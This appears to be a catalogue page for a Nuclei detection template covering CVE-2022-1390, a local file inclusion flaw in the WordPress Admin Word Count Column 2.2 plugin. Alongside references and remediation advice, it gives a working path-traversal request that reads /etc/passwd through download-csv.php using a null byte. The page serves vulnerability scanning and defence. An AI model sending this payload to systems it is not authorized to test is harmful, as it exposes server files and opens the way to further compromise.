WordPress Admin Word Count Column 2.2 - Local File Inclusion
ID: CVE-2022-1390
Severity: critical
Author: daffainfo,Splint3r7
Tags: cve,cve2022,packetstorm,wpscan,wordpress,wp-plugin,lfi,wp,admin_word_count_column_project
Description
Section titled “Description”The plugin does not validate the path parameter given to readfile(), which could allow unauthenticated attackers to read arbitrary files on server running old version of PHP susceptible to the null byte technique. This could also lead to RCE by using a Phar Deserialization technique.
YAML Source
Section titled “YAML Source”id: CVE-2022-1390
info: name: WordPress Admin Word Count Column 2.2 - Local File Inclusion author: daffainfo,Splint3r7 severity: critical description: | The plugin does not validate the path parameter given to readfile(), which could allow unauthenticated attackers to read arbitrary files on server running old version of PHP susceptible to the null byte technique. This could also lead to RCE by using a Phar Deserialization technique. impact: | An attacker can exploit this vulnerability to read sensitive files on the server, potentially leading to further compromise. remediation: | Update to the latest version of the WordPress Admin Word Count Column plugin (2.2 or higher) to fix the local file inclusion vulnerability. reference: - https://packetstormsecurity.com/files/166476/WordPress-Admin-Word-Count-Column-2.2-Local-File-Inclusion.html - https://wordpress.org/plugins/admin-word-count-column/ - https://wpscan.com/vulnerability/6293b319-dc4f-4412-9d56-55744246c990 - https://nvd.nist.gov/vuln/detail/CVE-2022-1390 - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-1390 cwe-id: CWE-22 epss-score: 0.96052 epss-percentile: 0.99452 cpe: cpe:2.3:a:admin_word_count_column_project:admin_word_count_column:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 vendor: admin_word_count_column_project product: admin_word_count_column framework: wordpress tags: cve,cve2022,packetstorm,wpscan,wordpress,wp-plugin,lfi,wp,admin_word_count_column_project
http: - method: GET path: - '{{BaseURL}}/wp-content/plugins/admin-word-count-column/download-csv.php?path=../../../../../../../../../../../../etc/passwd\0'
matchers-condition: and matchers: - type: regex regex: - "root:[x*]:0:0"
- type: status status: - 200# digest: 4b0a00483046022100cbb384058238d4d922e40ac19c70c63407a1685448545b9a0fa4592072b6b0c5022100c216d92dd64075ee6d8cb9f94017df9ca805c55259fa91ce6a920e4c25084083:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-1390.yaml"